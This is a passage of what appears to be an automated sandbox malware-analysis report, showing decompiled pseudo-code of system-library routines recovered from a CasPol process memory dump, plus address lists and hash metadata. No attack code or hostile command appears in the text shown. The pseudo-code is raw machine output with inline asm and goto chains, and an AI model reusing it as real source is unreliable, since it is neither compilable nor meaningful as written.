                                                                  													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                                  													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                                  													asm("movsd");
                                                                  													asm("movsd");
                                                                  													asm("movsd");
                                                                  													asm("movsd");
                                                                  													asm("movsd");
                                                                  													asm("movsd");
                                                                  													asm("movsd");
                                                                  													asm("movsd");
                                                                  													__eflags =  *(_t528 + 0x14);
                                                                  													if( *(_t528 + 0x14) == 0) {
                                                                  														__eflags =  *[fs:0x18] + 0xf50;
                                                                  													}
                                                                  													asm("movsd");
                                                                  													asm("movsd");
                                                                  													asm("movsd");
                                                                  													asm("movsd");
                                                                  													__eflags =  *(_t528 + 0x18);
                                                                  													if( *(_t528 + 0x18) == 0) {
                                                                  														_t454 =  *(_t528 - 0x80);
                                                                  														_t479 =  *(_t528 - 0x78);
                                                                  														_t327 = 1;
                                                                  														__eflags = 1;
                                                                  													} else {
                                                                  														_t146 = _t427 + 0x50; // 0x50
                                                                  														_t454 = _t146;
                                                                  														 *(_t528 - 0x80) = _t454;
                                                                  														_t382 = 0x18;
                                                                  														 *_t454 = _t382;
                                                                  														 *((short*)(_t454 + 2)) = 1;
                                                                  														_t385 = 0x10;
                                                                  														 *((short*)(_t454 + 6)) = _t385;
                                                                  														 *(_t454 + 4) = 0;
                                                                  														asm("movsd");
                                                                  														asm("movsd");
                                                                  														asm("movsd");
                                                                  														asm("movsd");
                                                                  														_t327 = 1;
                                                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                  														_t479 = 0x68;
                                                                  														 *(_t528 - 0x78) = _t479;
                                                                  													}
                                                                  													__eflags =  *(_t528 - 0x79) - _t327;
                                                                  													if( *(_t528 - 0x79) == _t327) {
                                                                  														_t524 = _t479 + _t427;
                                                                  														_t508 =  *(_t528 - 0x8c);
                                                                  														 *_t524 = _t508;
                                                                  														_t373 = 2;
                                                                  														 *((short*)(_t524 + 2)) = _t373;
                                                                  														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                                  														 *((short*)(_t524 + 4)) = 0;
                                                                  														_t167 = _t524 + 8; // 0x8
                                                                  														E0143F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                                  														_t529 = _t529 + 0xc;
                                                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                  														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                                  														 *(_t528 - 0x78) = _t479;
                                                                  														_t380 =  *(_t528 - 0x80);
                                                                  														__eflags = _t380;
                                                                  														if(_t380 != 0) {
                                                                  															_t173 = _t380 + 4;
                                                                  															 *_t173 =  *(_t380 + 4) | 1;
                                                                  															__eflags =  *_t173;
                                                                  														}
                                                                  														_t454 = _t524;
                                                                  														 *(_t528 - 0x80) = _t454;
                                                                  														_t327 = 1;
                                                                  														__eflags = 1;
                                                                  													}
                                                                  													__eflags =  *(_t528 - 0xd4);
                                                                  													if( *(_t528 - 0xd4) == 0) {
                                                                  														_t505 =  *(_t528 - 0x80);
                                                                  													} else {
                                                                  														_t505 = _t479 + _t427;
                                                                  														_t523 = 0x10;
                                                                  														 *_t505 = _t523;
                                                                  														_t367 = 3;
                                                                  														 *((short*)(_t505 + 2)) = _t367;
                                                                  														_t368 = 4;
                                                                  														 *((short*)(_t505 + 6)) = _t368;
                                                                  														 *(_t505 + 4) = 0;
                                                                  														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                                  														_t327 = 1;
                                                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                  														_t479 = _t479 + _t523;
                                                                  														 *(_t528 - 0x78) = _t479;
                                                                  														__eflags = _t454;
                                                                  														if(_t454 != 0) {
                                                                  															_t186 = _t454 + 4;
                                                                  															 *_t186 =  *(_t454 + 4) | 1;
                                                                  															__eflags =  *_t186;
                                                                  														}
                                                                  														 *(_t528 - 0x80) = _t505;
                                                                  													}
                                                                  													__eflags =  *(_t528 - 0x7a) - _t327;
                                                                  													if( *(_t528 - 0x7a) == _t327) {
                                                                  														 *(_t528 - 0xd4) = _t479 + _t427;
                                                                  														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                                  														E0143F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                                  														_t529 = _t529 + 0xc;
                                                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                  														_t479 =  *(_t528 - 0x78) + _t522;
                                                                  														 *(_t528 - 0x78) = _t479;
                                                                  														__eflags = _t505;
                                                                  														if(_t505 != 0) {
                                                                  															_t199 = _t505 + 4;
                                                                  															 *_t199 =  *(_t505 + 4) | 1;
                                                                  															__eflags =  *_t199;
                                                                  														}
                                                                  														_t505 =  *(_t528 - 0xd4);
                                                                  														 *(_t528 - 0x80) = _t505;
                                                                  													}
                                                                  													__eflags =  *(_t528 - 0xa8);
                                                                  													if( *(_t528 - 0xa8) != 0) {
                                                                  														_t356 = _t479 + _t427;
                                                                  														 *(_t528 - 0xd4) = _t356;
                                                                  														_t462 =  *(_t528 - 0xac);
                                                                  														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                                  														_t485 = 0xc;
                                                                  														 *((short*)(_t356 + 2)) = _t485;
                                                                  														 *(_t356 + 6) = _t462;
                                                                  														 *((short*)(_t356 + 4)) = 0;
                                                                  														_t211 = _t356 + 8; // 0x9
                                                                  														E0143F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                                  														E0143FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                                  														_t529 = _t529 + 0x18;
                                                                  														_t427 =  *(_t528 - 0x88);
                                                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                  														_t505 =  *(_t528 - 0xd4);
                                                                  														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                                  														 *(_t528 - 0x78) = _t479;
                                                                  														_t362 =  *(_t528 - 0x80);
                                                                  														__eflags = _t362;
                                                                  														if(_t362 != 0) {
                                                                  															_t222 = _t362 + 4;
                                                                  															 *_t222 =  *(_t362 + 4) | 1;
                                                                  															__eflags =  *_t222;
                                                                  														}
                                                                  													}
                                                                  													__eflags =  *(_t528 - 0xb0);
                                                                  													if( *(_t528 - 0xb0) != 0) {
                                                                  														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                                  														_t458 = 0xb;
                                                                  														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                                  														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                                  														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                                  														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                                  														E0143FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                                  														_t529 = _t529 + 0xc;
                                                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                  														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                                  														 *(_t528 - 0x78) = _t479;
                                                                  														__eflags = _t505;
                                                                  														if(_t505 != 0) {
                                                                  															_t241 = _t505 + 4;
                                                                  															 *_t241 =  *(_t505 + 4) | 1;
                                                                  															__eflags =  *_t241;
                                                                  														}
                                                                  													}
                                                                  													_t328 =  *(_t528 + 0x1c);
                                                                  													__eflags = _t328;
                                                                  													if(_t328 == 0) {
                                                                  														L87:
                                                                  														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                                  														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                                  														_t455 =  *(_t528 - 0xdc);
                                                                  														 *(_t427 + 0x14) = _t455;
                                                                  														_t480 =  *(_t528 - 0xa0);
                                                                  														_t517 = 3;
                                                                  														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                                  														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                                  															asm("rdtsc");
                                                                  															 *(_t427 + 0x3c) = _t480;
                                                                  														} else {
                                                                  															 *(_t427 + 0x3c) = _t455;
                                                                  														}
                                                                  														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                                  														_t456 =  *[fs:0x18];
                                                                  														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                                  														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                                  														_t427 = 0;
                                                                  														__eflags = 0;
                                                                  														_t511 = 0x18;
                                                                  														goto L91;
                                                                  													} else {
                                                                  														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                                  														__eflags = _t519;
                                                                  														 *(_t528 - 0x8c) = _t328;
                                                                  														do {
                                                                  															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                                  															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                                  															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                                  															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                                  															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                                  															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                                  																_t334 =  *_t519;
                                                                  															} else {
                                                                  																_t334 = 0;
                                                                  															}
                                                                  															_t336 = _t334 & 0x000000ff;
                                                                  															__eflags = _t336;
                                                                  															_t427 =  *(_t528 - 0x88);
                                                                  															if(_t336 == 0) {
                                                                  																_t481 = _t479 + _t506;
                                                                  																__eflags = _t481;
                                                                  																 *(_t528 - 0x78) = _t481;
                                                                  																E0143F3E0(_t479 + _t427, _t457, _t506);
                                                                  																_t529 = _t529 + 0xc;
                                                                  															} else {
                                                                  																_t340 = _t336 - 1;
                                                                  																__eflags = _t340;
                                                                  																if(_t340 == 0) {
                                                                  																	E0143F3E0( *(_t528 - 0xb8), _t457, _t506);
                                                                  																	_t529 = _t529 + 0xc;
                                                                  																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                                  																} else {
                                                                  																	__eflags = _t340 == 0;
                                                                  																	if(_t340 == 0) {
                                                                  																		__eflags = _t506 - 8;
                                                                  																		if(_t506 == 8) {
                                                                  																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                                  																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                                  																		}
                                                                  																	}
                                                                  																}
                                                                  															}
                                                                  															_t339 = 0x10;
                                                                  															_t519 = _t519 + _t339;
                                                                  															_t263 = _t528 - 0x8c;
                                                                  															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                                  															__eflags =  *_t263;
                                                                  															_t479 =  *(_t528 - 0x78);
                                                                  														} while ( *_t263 != 0);
                                                                  														goto L87;
                                                                  													}
                                                                  												}
                                                                  											} else {
                                                                  												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                                  												 *(_t528 - 0xa2) = _t392;
                                                                  												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                                  												__eflags = _t469;
                                                                  												while(1) {
                                                                  													 *(_t528 - 0xe4) = _t511;
                                                                  													__eflags = _t392;
                                                                  													_t393 = _t427;
                                                                  													if(_t392 != 0) {
                                                                  														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                                  													}
                                                                  													_t395 = (_t393 & 0x000000ff) - _t427;
                                                                  													__eflags = _t395;
                                                                  													if(_t395 == 0) {
                                                                  														_t511 = _t511 +  *_t469;
                                                                  														__eflags = _t511;
                                                                  													} else {
                                                                  														_t398 = _t395 - 1;
                                                                  														__eflags = _t398;
                                                                  														if(_t398 == 0) {
                                                                  															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                                  															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                                  														} else {
                                                                  															__eflags = _t398 == 1;
                                                                  															if(_t398 == 1) {
                                                                  																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                                  																_t402 =  *_t469 & 0x0000ffff;
                                                                  																 *(_t528 - 0xac) = _t402;
                                                                  																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                  															}
                                                                  														}
                                                                  													}
                                                                  													__eflags = _t511 -  *(_t528 - 0xe4);
                                                                  													if(_t511 <  *(_t528 - 0xe4)) {
                                                                  														break;
                                                                  													}
                                                                  													_t397 =  *(_t528 - 0x88) + 1;
                                                                  													 *(_t528 - 0x88) = _t397;
                                                                  													_t469 = _t469 + 0x10;
                                                                  													__eflags = _t397 -  *(_t528 + 0x1c);
                                                                  													_t392 =  *(_t528 - 0xa2);
                                                                  													if(_t397 <  *(_t528 + 0x1c)) {
                                                                  														continue;
                                                                  													}
                                                                  													goto L45;
                                                                  												}
                                                                  												_t475 = 0x216;
                                                                  												 *(_t528 - 0x74) = 0x216;
                                                                  												goto L45;
                                                                  											}
                                                                  										} else {
                                                                  											asm("lock dec dword [eax+ecx*8+0x4]");
                                                                  											goto L16;
                                                                  										}
                                                                  									}
                                                                  									_t491 = L014C4CAB(_t306, _t528 - 0xa4);
                                                                  									 *(_t528 - 0x74) = _t491;
                                                                  									__eflags = _t491;
                                                                  									if(_t491 != 0) {
                                                                  										goto L91;
                                                                  									} else {
                                                                  										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                  										goto L20;
                                                                  									}
                                                                  								}
                                                                  								L16:
                                                                  								 *(_t528 - 0x74) = 0x1069;
                                                                  								L93:
                                                                  								_t298 =  *(_t528 - 0xd0) + 1;
                                                                  								 *(_t528 - 0xd0) = _t298;
                                                                  								_t474 = _t474 + _t511;
                                                                  								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                  								_t494 = 4;
                                                                  								__eflags = _t298 - _t494;
                                                                  								if(_t298 >= _t494) {
                                                                  									goto L100;
                                                                  								}
                                                                  								_t494 =  *(_t528 - 0xcc);
                                                                  								_t435 = _t298;
                                                                  								continue;
                                                                  							}
                                                                  							__eflags = _t494[2] | _t494[3];
                                                                  							if((_t494[2] | _t494[3]) == 0) {
                                                                  								goto L15;
                                                                  							}
                                                                  							goto L12;
                                                                  						}
                                                                  						__eflags = _t301;
                                                                  						if(_t301 != 0) {
                                                                  							goto L92;
                                                                  						}
                                                                  						goto L10;
                                                                  						L92:
                                                                  						goto L93;
                                                                  					}
                                                                  				} else {
                                                                  					_push(0x57);
                                                                  					L101:
                                                                  					return E0144D130(_t427, _t494, _t511);
                                                                  				}
                                                                  			}










































































                                                                  0x014c603e
                                                                  0x014c6048
                                                                  0x014c6049
                                                                  0x014c604a
                                                                  0x014c604b
                                                                  0x014c604c
                                                                  0x014c604d
                                                                  0x014c6053
                                                                  0x014c6054
                                                                  0x014c6054
                                                                  0x014c6062
                                                                  0x014c6065
                                                                  0x014c6067
                                                                  0x014c606a
                                                                  0x014c6070
                                                                  0x014c6075
                                                                  0x014c6076
                                                                  0x014c6081
                                                                  0x014c6087
                                                                  0x014c6095
                                                                  0x014c6099
                                                                  0x014c609e
                                                                  0x014c60a4
                                                                  0x014c60ae
                                                                  0x014c60b0
                                                                  0x014c60b3
                                                                  0x014c60b6
                                                                  0x014c60b8
                                                                  0x014c60ba
                                                                  0x014c60ba
                                                                  0x014c60ba
                                                                  0x014c60ba
                                                                  0x014c60be
                                                                  0x014c60c0
                                                                  0x014c60c5
                                                                  0x014c60c5
                                                                  0x014c60c5
                                                                  0x014c60c6
                                                                  0x014c60cd
                                                                  0x014c6114
                                                                  0x014c60cf
                                                                  0x014c60cf
                                                                  0x014c60d4
                                                                  0x014c60d5
                                                                  0x014c60da
                                                                  0x014c60db
                                                                  0x014c60e1
                                                                  0x014c60e2
                                                                  0x014c60e8
                                                                  0x014c60f8
                                                                  0x014c60fd
                                                                  0x014c60fe
                                                                  0x014c6102
                                                                  0x014c6104
                                                                  0x014c6107
                                                                  0x014c6109
                                                                  0x014c610b
                                                                  0x014c610b
                                                                  0x014c610b
                                                                  0x014c610b
                                                                  0x014c610f
                                                                  0x014c610f
                                                                  0x014c6117
                                                                  0x014c611a
                                                                  0x014c611f
                                                                  0x014c6125
                                                                  0x014c6134
                                                                  0x014c6139
                                                                  0x014c613f
                                                                  0x014c6146
                                                                  0x014c6148
                                                                  0x014c614b
                                                                  0x014c614d
                                                                  0x014c614f
                                                                  0x014c614f
                                                                  0x014c614f
                                                                  0x014c614f
                                                                  0x014c6153
                                                                  0x014c6159
                                                                  0x014c6159
                                                                  0x014c615c
                                                                  0x014c6163
                                                                  0x014c6169
                                                                  0x014c616c
                                                                  0x014c6172
                                                                  0x014c6181
                                                                  0x014c6186
                                                                  0x014c6187
                                                                  0x014c618b
                                                                  0x014c6191
                                                                  0x014c6195
                                                                  0x014c61a3
                                                                  0x014c61bb
                                                                  0x014c61c0
                                                                  0x014c61c3
                                                                  0x014c61cc
                                                                  0x014c61d0
                                                                  0x014c61dc
                                                                  0x014c61de
                                                                  0x014c61e1
                                                                  0x014c61e4
                                                                  0x014c61e6
                                                                  0x014c61e8
                                                                  0x014c61e8
                                                                  0x014c61e8
                                                                  0x014c61e8
                                                                  0x014c61e6
                                                                  0x014c61ec
                                                                  0x014c61f3
                                                                  0x014c6203
                                                                  0x014c6209
                                                                  0x014c620a
                                                                  0x014c6216
                                                                  0x014c621d
                                                                  0x014c6227
                                                                  0x014c6241
                                                                  0x014c6246
                                                                  0x014c624c
                                                                  0x014c6257
                                                                  0x014c6259
                                                                  0x014c625c
                                                                  0x014c625e
                                                                  0x014c6260
                                                                  0x014c6260
                                                                  0x014c6260
                                                                  0x014c6260
                                                                  0x014c625e
                                                                  0x014c6264
                                                                  0x014c6267
                                                                  0x014c6269
                                                                  0x014c6315
                                                                  0x014c6315
                                                                  0x014c631b
                                                                  0x014c631e
                                                                  0x014c6324
                                                                  0x014c6327
                                                                  0x014c632f
                                                                  0x014c6330
                                                                  0x014c6333
                                                                  0x014c633a
                                                                  0x014c633c
                                                                  0x014c6335
                                                                  0x014c6335
                                                                  0x014c6335
                                                                  0x014c633f
                                                                  0x014c6342
                                                                  0x014c634c
                                                                  0x014c6352
                                                                  0x014c6355
                                                                  0x014c6355
                                                                  0x014c6359
                                                                  0x00000000
                                                                  0x014c626f
                                                                  0x014c6275
                                                                  0x014c6275
                                                                  0x014c6278
                                                                  0x014c627e
                                                                  0x014c627e
                                                                  0x014c6281
                                                                  0x014c6287
                                                                  0x014c628d
                                                                  0x014c6298
                                                                  0x014c629c
                                                                  0x014c62a2
                                                                  0x014c629e
                                                                  0x014c629e
                                                                  0x014c629e
                                                                  0x014c62a7
                                                                  0x014c62a7
                                                                  0x014c62aa
                                                                  0x014c62b0
                                                                  0x014c62f0
                                                                  0x014c62f0
                                                                  0x014c62f2
                                                                  0x014c62f8
                                                                  0x014c62fd
                                                                  0x014c62b2
                                                                  0x014c62b2
                                                                  0x014c62b2
                                                                  0x014c62b5
                                                                  0x014c62dd
                                                                  0x014c62e2
                                                                  0x014c62e5
                                                                  0x014c62b7
                                                                  0x014c62b8
                                                                  0x014c62bb
                                                                  0x014c62bd
                                                                  0x014c62c0
                                                                  0x014c62c4
                                                                  0x014c62cd
                                                                  0x014c62cd
                                                                  0x014c62c0
                                                                  0x014c62bb
                                                                  0x014c62b5
                                                                  0x014c6302
                                                                  0x014c6303
                                                                  0x014c6305
                                                                  0x014c6305
                                                                  0x014c6305
                                                                  0x014c630c
                                                                  0x014c630c
                                                                  0x00000000
                                                                  0x014c627e
                                                                  0x014c6269
                                                                  0x014c5eac
                                                                  0x014c5ebb
                                                                  0x014c5ebe
                                                                  0x014c5ecb
                                                                  0x014c5ecb
                                                                  0x014c5ece
                                                                  0x014c5ece
                                                                  0x014c5ed4
                                                                  0x014c5ed7
                                                                  0x014c5ed9
                                                                  0x014c5edb
                                                                  0x014c5edb
                                                                  0x014c5ee1
                                                                  0x014c5ee1
                                                                  0x014c5ee3
                                                                  0x014c5f20
                                                                  0x014c5f20
                                                                  0x014c5ee5
                                                                  0x014c5ee5
                                                                  0x014c5ee5
                                                                  0x014c5ee8
                                                                  0x014c5f11
                                                                  0x014c5f18
                                                                  0x014c5eea
                                                                  0x014c5eea
                                                                  0x014c5eed
                                                                  0x014c5ef2
                                                                  0x014c5ef8
                                                                  0x014c5efb
                                                                  0x014c5f0a
                                                                  0x014c5f0a
                                                                  0x014c5eed
                                                                  0x014c5ee8
                                                                  0x014c5f22
                                                                  0x014c5f28
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c5f30
                                                                  0x014c5f31
                                                                  0x014c5f37
                                                                  0x014c5f3a
                                                                  0x014c5f3d
                                                                  0x014c5f44
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c5f46
                                                                  0x014c5f48
                                                                  0x014c5f4d
                                                                  0x00000000
                                                                  0x014c5f4d
                                                                  0x014c5dda
                                                                  0x014c5ddf
                                                                  0x00000000
                                                                  0x014c5ddf
                                                                  0x014c5dd8
                                                                  0x014c5da7
                                                                  0x014c5da9
                                                                  0x014c5dac
                                                                  0x014c5dae
                                                                  0x00000000
                                                                  0x014c5db4
                                                                  0x014c5db4
                                                                  0x00000000
                                                                  0x014c5db4
                                                                  0x014c5dae
                                                                  0x014c5d88
                                                                  0x014c5d8d
                                                                  0x014c6363
                                                                  0x014c6369
                                                                  0x014c636a
                                                                  0x014c6370
                                                                  0x014c6372
                                                                  0x014c637a
                                                                  0x014c637b
                                                                  0x014c637d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c637f
                                                                  0x014c6385
                                                                  0x00000000
                                                                  0x014c6385
                                                                  0x014c5d38
                                                                  0x014c5d3b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c5d3b
                                                                  0x014c5d27
                                                                  0x014c5d29
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c6360
                                                                  0x00000000
                                                                  0x014c6360
                                                                  0x014c5c10
                                                                  0x014c5c10
                                                                  0x014c63da
                                                                  0x014c63e5
                                                                  0x014c63e5

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 99aa2e774bfe46e2b393afb8b3c7b516f51b8631475b7f2c6373a26677f70265
                                                                  • Instruction ID: 0d0329cd9a7c14c4d263ccdf7864ef25b7fe4dc204f9acf68d5083307b35f56a
                                                                  • Opcode Fuzzy Hash: 99aa2e774bfe46e2b393afb8b3c7b516f51b8631475b7f2c6373a26677f70265
                                                                  • Instruction Fuzzy Hash: 46425E75A00219CFDB64CF68C840BAABBB1FF45704F1581AED94DAB362D734A985CF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 92%
                                                                  			E01414120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                                  				signed int _v8;
                                                                  				void* _v20;
                                                                  				signed int _v24;
                                                                  				char _v532;
                                                                  				char _v540;
                                                                  				signed short _v544;
                                                                  				signed int _v548;
                                                                  				signed short* _v552;
                                                                  				signed short _v556;
                                                                  				signed short* _v560;
                                                                  				signed short* _v564;
                                                                  				signed short* _v568;
                                                                  				void* _v570;
                                                                  				signed short* _v572;
                                                                  				signed short _v576;
                                                                  				signed int _v580;
                                                                  				char _v581;
                                                                  				void* _v584;
                                                                  				unsigned int _v588;
                                                                  				signed short* _v592;
                                                                  				void* _v597;
                                                                  				void* _v600;
                                                                  				void* _v604;
                                                                  				void* _v609;
                                                                  				void* _v616;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				unsigned int _t161;
                                                                  				signed int _t162;
                                                                  				unsigned int _t163;
                                                                  				void* _t169;
                                                                  				signed short _t173;
                                                                  				signed short _t177;
                                                                  				signed short _t181;
                                                                  				unsigned int _t182;
                                                                  				signed int _t185;
                                                                  				signed int _t213;
                                                                  				signed int _t225;
                                                                  				short _t233;
                                                                  				signed char _t234;
                                                                  				signed int _t242;
                                                                  				signed int _t243;
                                                                  				signed int _t244;
                                                                  				signed int _t245;
                                                                  				signed int _t250;
                                                                  				void* _t251;
                                                                  				signed short* _t254;
                                                                  				void* _t255;
                                                                  				signed int _t256;
                                                                  				void* _t257;
                                                                  				signed short* _t260;
                                                                  				signed short _t265;
                                                                  				signed short* _t269;
                                                                  				signed short _t271;
                                                                  				signed short** _t272;
                                                                  				signed short* _t275;
                                                                  				signed short _t282;
                                                                  				signed short _t283;
                                                                  				signed short _t290;
                                                                  				signed short _t299;
                                                                  				signed short _t307;
                                                                  				signed int _t308;
                                                                  				signed short _t311;
                                                                  				signed short* _t315;
                                                                  				signed short _t316;
                                                                  				void* _t317;
                                                                  				void* _t319;
                                                                  				signed short* _t321;
                                                                  				void* _t322;
                                                                  				void* _t323;
                                                                  				unsigned int _t324;
                                                                  				signed int _t325;
                                                                  				void* _t326;
                                                                  				signed int _t327;
                                                                  				signed int _t329;
                                                                  
                                                                  				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                                  				_v8 =  *0x14ed360 ^ _t329;
                                                                  				_t157 = _a8;
                                                                  				_t321 = _a4;
                                                                  				_t315 = __edx;
                                                                  				_v548 = __ecx;
                                                                  				_t305 = _a20;
                                                                  				_v560 = _a12;
                                                                  				_t260 = _a16;
                                                                  				_v564 = __edx;
                                                                  				_v580 = _a8;
                                                                  				_v572 = _t260;
                                                                  				_v544 = _a20;
                                                                  				if( *__edx <= 8) {
                                                                  					L3:
                                                                  					if(_t260 != 0) {
                                                                  						 *_t260 = 0;
                                                                  					}
                                                                  					_t254 =  &_v532;
                                                                  					_v588 = 0x208;
                                                                  					if((_v548 & 0x00000001) != 0) {
                                                                  						_v556 =  *_t315;
                                                                  						_v552 = _t315[2];
                                                                  						_t161 = E0142F232( &_v556);
                                                                  						_t316 = _v556;
                                                                  						_v540 = _t161;
                                                                  						goto L17;
                                                                  					} else {
                                                                  						_t306 = 0x208;
                                                                  						_t298 = _t315;
                                                                  						_t316 = L01416E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                                  						if(_t316 == 0) {
                                                                  							L68:
                                                                  							_t322 = 0xc0000033;
                                                                  							goto L39;
                                                                  						} else {
                                                                  							while(_v581 == 0) {
                                                                  								_t233 = _v588;
                                                                  								if(_t316 > _t233) {
                                                                  									_t234 = _v548;
                                                                  									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                                  										_t254 = L01414620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                                  										if(_t254 == 0) {
                                                                  											_t169 = 0xc0000017;
                                                                  										} else {
                                                                  											_t298 = _v564;
                                                                  											_v588 = _t316;
                                                                  											_t306 = _t316;
                                                                  											_t316 = L01416E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                                  											if(_t316 != 0) {
                                                                  												continue;
                                                                  											} else {
                                                                  												goto L68;
                                                                  											}
                                                                  										}
                                                                  									} else {
                                                                  										goto L90;
                                                                  									}
                                                                  								} else {
                                                                  									_v556 = _t316;
                                                                  									 *((short*)(_t329 + 0x32)) = _t233;
                                                                  									_v552 = _t254;
                                                                  									if(_t316 < 2) {
                                                                  										L11:
                                                                  										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                                  											_t161 = 5;
                                                                  										} else {
                                                                  											if(_t316 < 6) {
                                                                  												L87:
                                                                  												_t161 = 3;
                                                                  											} else {
                                                                  												_t242 = _t254[2] & 0x0000ffff;
                                                                  												if(_t242 != 0x5c) {
                                                                  													if(_t242 == 0x2f) {
                                                                  														goto L16;
                                                                  													} else {
                                                                  														goto L87;
                                                                  													}
                                                                  													goto L101;
                                                                  												} else {
                                                                  													L16:
                                                                  													_t161 = 2;
                                                                  												}
                                                                  											}
                                                                  										}
                                                                  									} else {
                                                                  										_t243 =  *_t254 & 0x0000ffff;
                                                                  										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                                  											if(_t316 < 4) {
                                                                  												L81:
                                                                  												_t161 = 4;
                                                                  												goto L17;
                                                                  											} else {
                                                                  												_t244 = _t254[1] & 0x0000ffff;
                                                                  												if(_t244 != 0x5c) {
                                                                  													if(_t244 == 0x2f) {
                                                                  														goto L60;
                                                                  													} else {
                                                                  														goto L81;
                                                                  													}
                                                                  												} else {
                                                                  													L60:
                                                                  													if(_t316 < 6) {
                                                                  														L83:
                                                                  														_t161 = 1;
                                                                  														goto L17;
                                                                  													} else {
                                                                  														_t245 = _t254[2] & 0x0000ffff;
                                                                  														if(_t245 != 0x2e) {
                                                                  															if(_t245 == 0x3f) {
                                                                  																goto L62;
                                                                  															} else {
                                                                  																goto L83;
                                                                  															}
                                                                  														} else {
                                                                  															L62:
                                                                  															if(_t316 < 8) {
                                                                  																L85:
                                                                  																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                                  																goto L17;
                                                                  															} else {
                                                                  																_t250 = _t254[3] & 0x0000ffff;
                                                                  																if(_t250 != 0x5c) {
                                                                  																	if(_t250 == 0x2f) {
                                                                  																		goto L64;
                                                                  																	} else {
                                                                  																		goto L85;
